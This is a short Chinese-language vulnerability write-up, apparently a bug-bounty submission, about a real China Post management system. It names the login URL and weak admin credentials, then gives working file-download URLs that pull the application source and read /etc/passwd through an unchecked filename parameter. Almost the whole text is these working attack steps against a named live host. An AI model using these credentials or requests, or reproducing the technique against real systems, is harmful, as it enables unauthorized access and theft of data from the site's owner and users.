我是来刷WB的。。。可恶的301...
首先是弱口令
系统地址
http://bk.chinapost.com.cn/vip/login.jsp
需要用IE登陆
弱口令账户 admin / 123456
进去之后,发现找注入找不到啊,都是numberformat
找到一个模板下载
连接形式
http://bk.chinapost.com.cn/vip/common/download/down.jsp?filename=/file/imp_examples.xls
一看就是有问题的
http://bk.chinapost.com.cn/vip/common/download/down.jsp?filename=/login.jsp
直接下载源码
http://bk.chinapost.com.cn/vip/common/download/down.jsp?filename=/etc/passwd
直接读系统配置文件